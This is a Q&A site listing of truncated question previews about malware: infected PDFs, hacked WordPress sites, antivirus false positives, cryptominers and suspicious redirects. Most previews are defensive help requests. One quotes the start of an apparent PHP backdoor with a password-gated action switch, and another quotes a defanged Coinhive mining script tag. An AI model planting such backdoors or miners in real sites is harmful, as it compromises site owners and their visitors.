malware Questions

3

Solved

I have a PDF file that I know for a fact contains a JavaScript script file that does something malicious, not really sure what at this point. I have successfully uncompressed the PDF file and got...
Fulgurous asked 19/4, 2012 at 1:37

6

Solved

I want to analyze a stream object in a PDF file which is encoded using /FlateDecode. Are there any tools which allow one to decode such encoding (ASCII85decode, LZWDecode, RunlenghtDecode etc.) us...
Arondell asked 17/1, 2015 at 9:11

1

I am hosting a simple prototype on Amazon Lightsail and I saw some strange requests on my Django server. Is it anything to be concerned about? Invalid HTTP_HOST header: 'fuwu.sogou.com'. You may ne...
Bisector asked 1/8, 2021 at 2:56

2

My Wordpress website got hacked. It redirected the user to some spam website. Since than I already cleaned the website and the problem does not occur anymore. The problem is, that my visitors are ...
Erinaceous asked 16/4, 2018 at 10:7

2

So, I created a python program. Converted to exe using Py2Exe, and tried with PyInstaller and cx_freeze as well. All these trigger the program to be detected as virus by avast, avg, and others on v...
Rally asked 26/1, 2018 at 15:43

3

I have to fix a website that is infected with malware. When I try to access to the WP Admin it says "to many redirects". Hosting company did a scan, there were to many infected files. I m...
Blaseio asked 4/11, 2020 at 3:40

7

Solved

Problem:- Sometimes, on clicking on NAVBAR menu or on any div on my bootstrap website, It redirects to ads or unknown links in new tab something like this. http://cobalten.com/afu.php?zoneid=1365...
Displace asked 27/6, 2018 at 14:7

1

electron.js is a user interface toolkit that allows a web application to operate as an arbitrary GUI. However, there are some applications that should be considered sensitive - for instance, a GUI...
Befall asked 23/12, 2017 at 14:53

19

Solved

We are using an EC2(Ubuntu) amazon instance for running Apache.Recently we noticed that there is a process using the entire CPU. We removed it using the help of the following procedure [r...
Uzial asked 10/2, 2020 at 13:37

3

Solved

I have an application I wrote for my company in Python 2.x, PyQT4, and MySQLdb and packaged with py2exe. Recently, I made some updates to the application, Porting it to Python 3.4 and PySide. I al...
Dunkle asked 22/5, 2014 at 19:6

2

Solved

Someone contacted me with a problem regarding Discord. The code below was brought to my attention as it was run around the time the problems began. Windows asks what program the code below should b...
Syllogize asked 14/2, 2021 at 3:34

2

I'm investigating a set of Windows API system calls made by a piece of malware running in a sandbox so that I can understand its malicious intent. Unfortunately, I'm struggling to understand the Zw...
Apian asked 3/10, 2018 at 7:0

3

<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '')) { switch ($_REQUEST['action']) { case 'get_all_links'; foreach ($wpdb-...
Meenen asked 20/1, 2017 at 6:27

1

Recently my C programs started to act weirdly and I had no idea why... Then I realized that they were being flagged by my antivirus program as malware... First I thought there's a malware in my com...
Guanidine asked 28/6, 2020 at 12:48

3

Solved

Does anyone know what app is writing to file "%TEMP%\Encoding Time.csv"? The file is constantly growing. Searching Internet did not yield any meaningful results. Below is an example of th...
Elater asked 13/5, 2017 at 23:45

1

JShell by default enables a persistent history of everything typed, which can be recalled by pressing the up arrow. Where is the setting to turn this ❝feature❞ off? Also, how do I even clear the ...
Troat asked 14/10, 2018 at 18:7

3

I want to scan files for virus and malware before they are uploaded to the server. For example, once a user uploads a file, there should be a scanner to detect if there is a virus or malware and re...
Twain asked 9/4, 2019 at 11:5

2

there, Which application uses port 6443 and for what? I want this information because when I use the command nmap with mi ip, there is a line that puts "6443 sun-sr-https". Is it something a...
Beata asked 10/5, 2017 at 11:48

6

Solved

I have three websites all hosted on the same webserver. Recently I was working on one of the websites and noticed that, about a month ago, a bunch of files had been changed. Specifically, all insta...
Unconscionable asked 4/4, 2017 at 15:42

3

Solved

I found some of my users visiting a site that seemed to have a Bitcoin mining JS script in its code: <script src = "hxxps://coin-hive.com/lib/coinhive.min.js"></script><script> ...
Bacillus asked 28/9, 2017 at 19:30

1

Solved

I downloaded Microsoft SDK and Visual Studio 2015 on Windows 10 and a shortcut to file WPCups.exe showed up on my desktop. It's located in C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\T...
Pridemore asked 1/4, 2017 at 6:24

3

Solved

I have seen some Android apps on my phone require this android.permission.READ_PHONE_STATE permission. I don't know if I could trust them. I know this permission will give the app access to many in...
Putrescible asked 13/11, 2013 at 23:52

3

Every page I browse with Chrome shows this error in the console: extensions::uncaught_exception_handler:8 Error in event handler for (unknown): SyntaxError: Failed to execute 'insertRule' on 'C...
Breadroot asked 14/10, 2015 at 21:52

1

Solved

I'm a little bit lost on this issue, so please excuse me. I know there are other threads on SO about this but I can't find the answer. On the site when it's loaded it doesn't matter where the use...
Rigmarole asked 24/11, 2016 at 6:42

4

Solved

Let us try to access http://yahoo.com@3627729518 with any browser. We get redirected to google.com. 3627729518 is the decimal representation of 11011000.00111010.11000010 .01101110 without dots...
Pinnate asked 23/9, 2016 at 15:13

© 2022 - 2024 — McMap. All rights reserved.